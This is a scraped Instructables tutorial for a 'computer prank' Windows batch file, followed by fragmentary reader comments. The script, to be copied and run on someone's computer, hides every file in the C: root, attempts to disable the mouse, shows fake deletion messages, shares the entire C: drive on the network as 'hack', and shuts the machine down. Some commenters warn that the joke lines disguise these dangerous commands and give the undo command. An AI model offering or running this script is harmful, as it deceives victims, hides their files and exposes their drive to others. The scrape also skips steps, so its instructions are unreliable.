Freaky Computer Prank
Freaky Computer Prank
Freaky Computer Prank
Table of Contents
step 2: Encoding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Related Instructables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Advertisements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Comments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
http://www.instructables.com/id/Freaky_Computer_Prank/
intro: Freaky Computer Prank
In this Instructables, we will make batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit
more. Someone could tweak it a little and perhaps, change the DOS text to green.
3) Point to "Accesories".
Image Notes
1. Never mind this dualog box.
step 2: Encoding
Copy the code below:
@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60
To copy it: first highlight the codes then press CTRL (Hold until C has not yet pressed) then C.
http://www.instructables.com/id/Freaky_Computer_Prank/
step 3: Save the Batch
To save the codes you pasted:
Save As dialog box will appear. Simply type computer_robot.bat on the File name textbox.
Image Notes
1. This is the file name textbox.
Ahhhhhhhhhhhhhhhhhhhhhhhhh!
http://www.instructables.com/id/Freaky_Computer_Prank/
Related Instructables
Advertisements
Make Magazine Special Offer
Comments
50 comments Add Comment view all 61 comments
http://www.instructables.com/id/Freaky_Computer_Prank/
ismaelplague says: Mar 24, 2009. 9:19 AM REPLY
yes there is you would need to find the program that controls it in the taskmanager. and the you will need to use command prompt to disable it
like this taskkill /pid "enter the name here
"
C) While googling "end mouse application", I found the script for a real batch virus that uses "rundll32.exe mouse, disable" and
"rundll32.exe keyboard, disable". I haven't tried them yet, but I thought I'd mention it.
ive only just started with all this just a observation and if i have got this wrong please someone let me know.
Also, don't run this if you don't know what it will do and how to fix it, it will only end in pain for you.
@echo OFF
attrib -h C:\Documents And Settings\*.*
No seriously, the writer of this batch file just obscured the dangerous commands with drivel. "Attrib" hides all your files in the root of your C-drive, and "net
share" shares your C-Drive under the name 'hack'.
If you don't understand each and every line in that batch file, you're stupid by running it. The only PC you will hack is your own, you guys are being played
like so many fiddles!
http://www.instructables.com/id/Freaky_Computer_Prank/
imthereal says: Oct 22, 2008. 8:29 PM REPLY
isn't that bad for the computer?
http://www.instructables.com/id/Freaky_Computer_Prank/
darkanchor says: Dec 19, 2008. 4:15 AM REPLY
true where can i find the stuff that were on my destkop
Attrib +h C:*.*
Type this into Command Prompt/RandomFile.bat, but replace "+h" with "-h" (Attrib -h C:*.*).
It should give you back your icons, documents, and other things back. It worked when I tried it.
1. Print a message to the screen (The matrix has you, you can not escape)
2. Disable your Mouse
3. Set the hidden attribute to all files under C:\
4. Print some nonsense to the terminal screen (deleting... and 0101...)
5. Give out all file associations (two times)
6. Hide all directories under C:Documents and settings*.*
7. Share your C:\ Drive using the name "hack" (if you don't have a firewall this can be very dangerous!)
8. Cleanly shutdown your computer after 60 seconds (seems to be an older syntax, may not work on XP/Vista)
http://www.instructables.com/id/Freaky_Computer_Prank/
Shadow Ops says: Dec 4, 2008. 4:35 PM REPLY
*for shutdown.
http://www.instructables.com/id/Freaky_Computer_Prank/